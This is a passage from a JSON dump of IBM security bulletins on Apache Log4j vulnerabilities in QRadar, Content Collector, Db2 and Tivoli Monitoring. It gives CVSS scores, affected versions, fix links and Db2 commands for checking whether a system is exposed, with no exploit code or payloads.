Analytics| 1.0.0 - 4.1.5 \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading IBM\u00ae QRadar User Behavior Analytics add on to IBM\u00ae QRadar SIEM to version 4.1.6 \n\n[Updated in version 4.1.6](<https://exchange.xforce.ibmcloud.com/hub/extension/6f5cc6de1e5e2dad38bfa755c3f2b80b> \"Updated in version 4.1.4\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n07 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSBQAC\",\"label\":\"IBM QRadar SIEM\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"4.1.6\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-01-10T14:02:11", "type": "ibm", "title": "Security Bulletin: Log4j as used in IBM\u00ae QRadar User Behavior Analytics add on to IBM\u00ae QRadar SIEM is vulnerable to denial of service. (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45105"], "modified": "2022-01-10T14:02:11", "id": "393A985D4478230C9D2C42E9A4B6209E9A8A450BC8302073A121E3B160C57EFB", "href": "https://www.ibm.com/support/pages/node/6539470", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-06-28T22:01:10", "description": "## Summary\n\nApache Log4j open source library is used by Content Collector for IBM Connections. This bulletin describes the upgrades necessary to address the vulnerability. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for IBM Connections| 4.0.x \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading the product below: \n\n**Product**\n\n| **VRM**| **Remediation** \n---|---|--- \nContent Collector for IBM Connections| 4.0.1| Upgrade to: Content Collector for IBM Connections [4.0.1.13 Interim Fix 001](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.13-IBM-ICC-IF001&source=SAR> \"4.0.1.13 Interim Fix 001\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n14 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSAE9L\",\"label\":\"Content Collector\"},\"Component\":\"Content Collector for Email\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"4.0.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-01-14T13:16:58", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects Content Collector for IBM Connections (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45105"], "modified": "2022-01-14T13:16:58", "id": "06543959E3F80611BA94C3105900D725FA079835346EA88779BC4F272E259FC6", "href": "https://www.ibm.com/support/pages/node/6540942", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-06-28T22:01:31", "description": "## Summary\n\nApache Log4j open source library is used by Content Collector for Email. This bulletin describes the upgrades necessary to address the vulnerability. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.x \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading the product below:\n\n**Product**\n\n| **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1| Upgrade to: Content Collector for Email [4.0.1.13 Interim Fix IF001](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.13-IBM-ICC-IF001&source=SAR> \"4.0.1.13 Interim Fix IF001\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n14 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSAE9L\",\"label\":\"Content Collector\"},\"Component\":\"Content Collector for Email\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"4.0.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-01-14T13:14:01", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects Content Collector for Email (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45105"], "modified": "2022-01-14T13:14:01", "id": "7CCDD8E65FBE1F2581D0942E2116E4E61FB4753B4D48798C9D2BC8624C94826A", "href": "https://www.ibm.com/support/pages/node/6540938", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-06-28T22:04:44", "description": "## Summary\n\nThe Apache Log4j open source library used by IBM\u00ae Db2\u00ae is affected by a vulnerability that could allow a remote attacker to execute arbitrary code on the system. This library is used by the Db2 Federation feature. The fix for the vulnerability is to update the log4j library to version 2.17.1. Please see CVE-2021-4104 for bulletin relating to Log4j V1. Please see CVE-2021-45046, CVE-2021-45105 and CVE-2021-44228 for bulletins relating to Log4j V2.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nFix pack levels of IBM Db2 V11.5 for all editions on all platforms are affected only if the following features are configured:\n\nFederation: \n\n * DVM JDBC wrapper driver,\n * NoSQL wrapper driver (for Hadoop),\n * Blockchain wrapper driver (for Hyperledger Fabric, Linux 64-bit, x86-64 only)\n\nIBM Db2 V9.7, V10.1, V10.5 and V11.1 are not affected by this issue. Please note that log4j v1.x was removed in a previous build, and customers are strongly recommended to apply those fixes if you are on an older version of Db2. See [Security Bulletin](<https://www.ibm.com/support/pages/node/6528678> \"Security Bulletin\" ) for details.\n\nTo determine if Federation is enabled, issue the following:\n\ndb2 get dbm cfg | grep FEDERATED\n\nIf a value of NO is returned, you are not vulnerable.\n\nYou can determine if you are using one of the affected wrappers by performing:\n\nTo determine if the DVM JDBC wrapper is in use, issue the following statement:\n\ndb2 \"select servername from syscat.serveroptions where option = 'DRIVER_CLASS' and setting = 'com.rs.jdbc.dv.DvDriver'\"\n\nIf a servername is returned, then you are using the DVM JDBC wrapper via the DvDriver class.\n\n \nTo determine if the NoSQL hadoop wrapper is in use, issue the following statement:\n\ndb2 \"select * from syscat.servers where servertype = 'HDFSPARQUET'\" \n\nIf 1 or more rows are returned, then NoSQL hadoop wrapper is in use.\n\nTo determine if the NoSQL Blockchain wrapper is in use, issue the following statement:\n\ndb2 \"select * from syscat.serveroptions where option='PEER_URL'\"\n\nIf 1 or more rows are returned, then NoSQL Blockchain wrapper is in use.\n\n## Remediation/Fixes\n\nCustomers running any vulnerable fixpack level of an affected Program, V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fixpack level for the V11.5.6 and V11.5.7 release. They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.\n\n**Release**| **Fixed in fix pack**| **APAR**| **Download URL** \n---|---|---|--- \nV11.5| TBD| [IT39584](<https://www.ibm.com/support/pages/apar/IT39584> \"IT39584\" )| Special Build for V11.5.6: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13806_140511_DB2-aix64-universal_fixpack-11.5.6.0-FP000%3A845800489744802176&includeSupersedes=0> \"AIX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13806_140509_DSClients-linuxia32-client-11.5.6.0-FP000%3A517046716861436544&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13806_140512_DB2-linuxx64-universal_fixpack-11.5.6.0-FP000%3A956085215716772224&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 little endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13806_140513_DB2-linuxppc64le-universal_fixpack-11.5.6.0-FP000%3A437126386150870272&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13806_140510_DB2-linux390x64-universal_fixpack-11.5.6.0-FP000%3A526111219902489984&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13806_140508_DSClients-nt32-client-11.5.6000.1809-FP000%3A411600865803667264&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13806_140507_DB2-ntx64-universal_fixpack-11.5.6000.1809-FP000%3A273075359147908384&includeSupersedes=0> \"Windows 64-bit, x86\" ) \n \nV11.5| TBD| [IT39584](<https://www.ibm.com/support/pages/apar/IT39584> \"IT39584\" )| Special Build for V11.5.7: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13804_140490_DB2-aix64-universal_fixpack-11.5.7.0-FP000%3A739677415521383680&includeSupersedes=0> \"AIX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13804_140492_DSClients-linuxia32-client-11.5.7.0-FP000%3A621367591425352448&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13804_140491_DB2-linuxx64-universal_fixpack-11.5.7.0-FP000%3A616785723755219840&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 little endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13804_140488_DB2-linuxppc64le-universal_fixpack-11.5.7.0-FP000%3A668578784371908480&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13804_140489_DB2-linux390x64-universal_fixpack-11.5.7.0-FP000%3A405321266302374848&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13804_140487_DSClients-nt32-client-11.5.7000.1973-FP000%3A435060970530732096&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13804_140486_DB2-ntx64-universal_fixpack-11.5.7000.1973-FP000%3A227966840130434560&includeSupersedes=0> \"Windows 64-bit, x86\" ) \n \n## Workarounds and Mitigations\n\nOn a Unix-type system, if you are not using Federation wrappers, you can remove log4j jar files. \n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\nSee [Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-4104)](<https://www.ibm.com/support/pages/node/6528678> \"Security Bulletin: \u00a0Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \u00a0 \\(CVE-2021-4104\\)\" )\n\nSee [Security Bulletin: Multiple vulnerabilities in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-45046, CVE-2021-45105)](<https://www.ibm.com/support/pages/node/6528672> \"Security Bulletin: \u00a0Multiple vulnerabilities in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \u00a0 \\(CVE-2021-45046, CVE-2021-45105\\)\" )\n\nSee [Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6526462> \"Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \\(CVE-2021-44228\\)\" )\n\n## Acknowledgement\n\n## Change History\n\n06 June 2022: Updated with links to related Log4j bulletins \n08 Mar 2022: Updated to the correct link for Linux 64-bit, POWER little endian \n24 Feb 2022: Added workaround note regarding removing log4j files when on a Unix-type system and Federation wrappers are not being used. \n02 Feb 2022: Clarified versions impacted \n28 Jan 2022: Added a clarification for releases not impacted. \n24 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Product\":{\"code\":\"SSEPGG\",\"label\":\"DB2 for Linux- UNIX and Windows\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"11.5.x\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-07T03:37:18", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-06-07T03:37:18", "id": "6DF2E72D03F9AA8435A0A58D154D82EDF5203309F8C81C42E35CBC71D2A79BDD", "href": "https://www.ibm.com/support/pages/node/6549888", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "## Summary\n\nThe following security issue has been identified in components related to IBM Tivoli Monitoring (ITM) portal server and client. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-4104](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit 